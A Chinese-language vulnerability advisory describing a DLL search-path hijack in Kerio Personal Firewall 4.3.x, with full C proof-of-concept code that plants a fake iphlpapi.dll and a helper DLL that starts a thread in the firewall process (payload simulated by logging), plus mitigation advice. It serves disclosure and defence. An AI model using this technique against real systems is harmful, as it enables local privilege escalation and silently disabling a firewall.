Kerio可注入伪造iphlpapi DLL漏洞

发布日期:2007-01-04
更新日期:2007-01-04

受影响系统:
Kerio Personal Firewall 4.3.268
Kerio Personal Firewall 4.3.246
描述:
BUGTRAQ  ID: 21828

Kerio Personal Firewall是一款个人桌面系统防火墙。

Kerio Personal Firewall 在加载其依赖的系统库 iphlpapi.dll 时存在 DLL 搜索路径问题,本地攻击者可能利用此漏洞以防火墙进程的权限执行任意代码,从而提升权限或使防火墙失效。

Kerio Personal Firewall 以不带路径的文件名加载库文件 iphlpapi.dll,因此按照 LoadLibrary 的标准搜索顺序首先在软件的安装目录中查找,找不到时才从操作系统目录加载;而该安装目录对普通用户可写,本地攻击者可以在其中放置伪造的 iphlpapi.dll,防火墙服务下次启动(例如系统重启)时便会加载并执行其中的代码,导致以防火墙服务的权限执行攻击者的任意指令。利用前提是攻击者已拥有本机账号并对安装目录具有写权限。

<*来源:Matousec (http://www.matousec.com/)
  
  链接:http://www.matousec.com/info/advisories/Kerio-Fake-iphlpapi-DLL-injection.php
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/*

Testing program for Fake 'iphlpapi' DLL injection (BTP00002P001SK)


Usage:
test INSTPATH
   INSTPATH - Kerio installation directory (the directory the fake "iphlpapi.dll" is written into)

Description:
This program demonstrates the possibility of installation of a fake "iphlpapi.dll" to Kerio processes.
The exploitation of this vulnerability is inconspicuous for common user even if the fake DLL does not simulate
the functionality of original "iphlpapi.dll". Helper library called "testdll.dll" is copied to the installation directory
of Kerio and renamed to "iphlpapi.dll". Because Kerio loads this DLL dynamically using LoadLibrary API and does
not check the origin of the loaded module, it loads our library instead of the original "iphlpapi.dll" during its startup.
When "testdll.dll" is loaded, it creates an extra thread that could execute malicious code. In this demonstration
the malicious code is simulated by harmless code that appends messages to a log file.

Test:
Run the testing program from the directory that contains "testdll.dll" (the copy uses a relative source path),
passing the Kerio installation directory as its only argument, then reboot. After the restart the Kerio process
loads the planted DLL and C:\BTP00002P001SK.log starts receiving a new entry every 10 seconds. The account running
the test needs write access to the installation directory.

*/

#include <stdio.h>
#include <windows.h>


/*
 * Print the banner identifying this test program on stdout.
 * The text is observable output of the tool and is kept byte-for-byte.
 */
void about(void)
{
  static const char banner[] =
    "Testing program for Fake 'iphlpapi' DLL injection (BTP00002P001SK)\n"
    "Windows Personal Firewall analysis project\n"
    "Copyright 2007 by Matousec - Transparent security\n"
    "http://www.matousec.com/\n\n";
  fputs(banner, stdout);
}

/*
 * Print the command-line synopsis on stdout.
 */
void usage(void)
{
  fputs("Usage: test INSTPATH\n"
        "  INSTPATH - Kerio installation directory\n", stdout);
}

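/*
 * Report the calling thread's last Win32 error on stderr.
 *
 * FormatMessageA is used explicitly so the returned buffer is always a
 * narrow (char) string and matches the "%s" conversion even in a build
 * that defines UNICODE (the original LPTSTR/FormatMessage pair would hand
 * a wide string to fprintf in that case).  FORMAT_MESSAGE_IGNORE_INSERTS
 * is set because no Arguments array is supplied: a system message that
 * contains insert sequences would otherwise be expanded from a NULL
 * argument list.  DWORD is unsigned, hence "%lu".  The buffer is allocated
 * by the system (FORMAT_MESSAGE_ALLOCATE_BUFFER) and released with LocalFree.
 */
void print_last_error(void)
{
  DWORD code = GetLastError();
  LPSTR buf = NULL;
  DWORD len = FormatMessageA(FORMAT_MESSAGE_ALLOCATE_BUFFER
                             | FORMAT_MESSAGE_FROM_SYSTEM
                             | FORMAT_MESSAGE_IGNORE_INSERTS,
                             NULL, code, 0, (LPSTR)&buf, 0, NULL);
  if (len == 0 || buf == NULL)
  {
    fprintf(stderr, "Unable to format error message for code %lu.\n", (unsigned long)code);
    return;
  }

  fprintf(stderr, "Error code: %lu\n", (unsigned long)code);
  /* System messages normally end in "\r\n", so no newline is appended here. */
  fprintf(stderr, "Error message: %s", buf);
  LocalFree(buf);
}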


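/*
 * Entry point: copy "testdll.dll" from the current directory into the Kerio
 * installation directory under the name "iphlpapi.dll".
 *
 * argv[1] is the Kerio installation directory; any other argument count
 * prints the usage text.  Returns 0 when the copy succeeds and 1 on a usage
 * error, on an installation path that does not fit in MAX_PATH, or on a
 * failed CopyFile (in which case the Win32 error is printed to stderr).
 *
 * CopyFile is called with bFailIfExists == FALSE, so an iphlpapi.dll already
 * present in the target directory is overwritten — intended for the demo.
 */
int main(int argc,char **argv)
{
  about();

  if (argc!=2)
  {
    usage();
    return 1;
  }

  /* Build "<INSTPATH>\iphlpapi.dll".  A silently truncated path would copy
     the DLL somewhere else entirely, so overflow of MAX_PATH is a hard error
     rather than a warning. */
  char testdll_new[MAX_PATH];
  int n = snprintf(testdll_new, sizeof testdll_new, "%s\\iphlpapi.dll", argv[1]);
  if (n < 0 || (size_t)n >= sizeof testdll_new)
  {
    fprintf(stderr, "Installation path is too long (limit is %u characters).\n",
            (unsigned)(MAX_PATH - 1));
    printf("\nTEST FAILED!\n");
    return 1;
  }

  if (CopyFile("testdll.dll",testdll_new,FALSE))
  {
    printf("\"testdll.dll\" copied to \"%s\".\n",testdll_new);
    printf("\nTEST SUCCESSFUL!\n");
    return 0;
  }

  fprintf(stderr,"Unable to copy \"testdll.dll\" to \"%s\".\n",testdll_new);
  print_last_error();
  printf("\nTEST FAILED!\n");
  return 1;
}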


/*

Helper DLL for Fake 'iphlpapi' DLL injection (BTP00002P001SK)

Description:
This DLL creates a new thread that can be used for executing malicious code. The malicious code is simulated
by a harmless code that logs messages to a file.

*/

#include <stdio.h>
#include <windows.h>

/* Handle of the worker thread started in DllMain; NULL until DLL_PROCESS_ATTACH. */
HANDLE thread=NULL;
/* Scratch buffer for the next log line.  Written by DllMain and by the worker
   thread without any synchronisation — NOTE(review): a detach notification
   racing with thread_proc can interleave the two messages. */
char msg[1024];

/* Appends the current contents of msg to the demo log file (defined below). */
void logmsg();

/*
logmsg logs messages to C:\BTP00002P001SK.log
*/

/*
 * Append the current contents of the global msg buffer to
 * C:\BTP00002P001SK.log, creating the file if it does not exist.
 *
 * Best effort: a failed CreateFile, SetFilePointer or WriteFile is ignored,
 * because this log is the demo's only output channel and there is nowhere
 * else to report the failure.  NOTE(review): the log lives at a fixed path
 * in the root of C:\ and is opened by whatever process loaded the DLL — fine
 * for a demonstration, not a pattern to copy into real code.
 */
void logmsg(void)
{
  HANDLE log = CreateFile("C:\\BTP00002P001SK.log", GENERIC_WRITE, 0, NULL,
                          OPEN_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
  if (log == INVALID_HANDLE_VALUE)
    return;

  /* Seek to the end so successive calls append rather than overwrite. */
  SetFilePointer(log, 0, NULL, FILE_END);
  DWORD written = 0;
  WriteFile(log, msg, (DWORD)strlen(msg), &written, NULL);
  CloseHandle(log);
}


/*
thread routine that can execute malicious code with the privileges of vsmon.exe
*/

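/*
 * Worker thread started from DllMain; stands in for attacker-controlled code.
 *
 * Once the planted DLL is loaded this runs with the privileges of the Kerio
 * process that loaded it.  (The original comment said "vsmon.exe", a name
 * that appears nowhere else in this advisory — presumably copied from a
 * sibling test; the host here is whichever Kerio binary mapped the DLL.)
 * The payload is simulated by appending a line to the log every 10 seconds.
 * The loop never exits on its own; it ends via TerminateThread in DllMain or
 * when the host process exits.
 *
 * param: the value passed to CreateThread — the DLL's own HINSTANCE.  The
 * parameter is LPVOID, the signature CreateThread expects, so calling it
 * through an LPTHREAD_START_ROUTINE is well defined; callers that pass an
 * HMODULE directly still compile.
 *
 * Fixes: GetCurrentProcessId() returns a DWORD (unsigned long), so the
 * conversion is "%lu" rather than "%ld"; the module handle is cast to
 * void * for "%p".
 */
DWORD WINAPI thread_proc(LPVOID param)
{
  HMODULE module = (HMODULE)param;
  for (;;)
  {
    snprintf(msg, sizeof msg,
             "Any code can be executed now in process PID=%lu, using module at 0x%p.\n",
             (unsigned long)GetCurrentProcessId(), (void *)module);
    logmsg();
    Sleep(10000);
  }
}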


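/*
 * DLL entry point for the planted iphlpapi.dll.
 *
 * On DLL_PROCESS_ATTACH it logs a line and starts thread_proc, which keeps
 * logging from inside the host process.  On DLL_PROCESS_DETACH it logs again
 * and tears the thread down.  Always returns TRUE so the load succeeds.
 *
 * Two caveats a reader should know about (demo behaviour, documented rather
 * than redesigned because the thread body lives in thread_proc):
 *  - Creating a thread from DllMain is discouraged: DllMain runs under the
 *    loader lock, and the new thread cannot get past its own DLL
 *    notifications until this call returns.
 *  - TerminateThread is a last resort; it gives the thread no chance to
 *    release anything it holds.  It is skipped when lpvReserved is non-NULL
 *    (process termination), since by then the other threads have already
 *    been ended by the system.
 *
 * Fix: GetCurrentProcessId() is a DWORD, so the conversion is "%lu", and the
 * handle is cast to void * for "%p".
 */
BOOL WINAPI DllMain(HINSTANCE hinstDLL,DWORD fdwReason,LPVOID lpvReserved)
{
  if (fdwReason==DLL_PROCESS_ATTACH)
  {
    DisableThreadLibraryCalls(hinstDLL);

    snprintf(msg, sizeof msg,
             "DLL_PROCESS_ATTACH for testdll.dll in process PID=%lu, hinstDLL = 0x%p\n",
             (unsigned long)GetCurrentProcessId(), (void *)hinstDLL);
    logmsg();
    /* The cast covers both the HMODULE and the LPVOID form of thread_proc. */
    thread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)thread_proc,hinstDLL,0,NULL);
  }
  else if (fdwReason==DLL_PROCESS_DETACH && thread)
  {
    snprintf(msg, sizeof msg,
             "DLL_PROCESS_DETACH for testdll.dll in process PID=%lu, hinstDLL = 0x%p\n",
             (unsigned long)GetCurrentProcessId(), (void *)hinstDLL);
    logmsg();
    if (lpvReserved == NULL)
      TerminateThread(thread,0);
    CloseHandle(thread);
    thread = NULL;
  }

  return TRUE;
}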

建议:
厂商补丁:

Kerio
-----
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本。在补丁发布前,可以收紧 Kerio 安装目录的 ACL,仅允许管理员写入,以阻止非特权用户在其中放置伪造的 DLL;同时检查安装目录中是否已出现 iphlpapi.dll(正常情况下该文件只应由操作系统目录提供),若存在则应视为可疑并核查其来源。

http://www.kerio.com/

本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载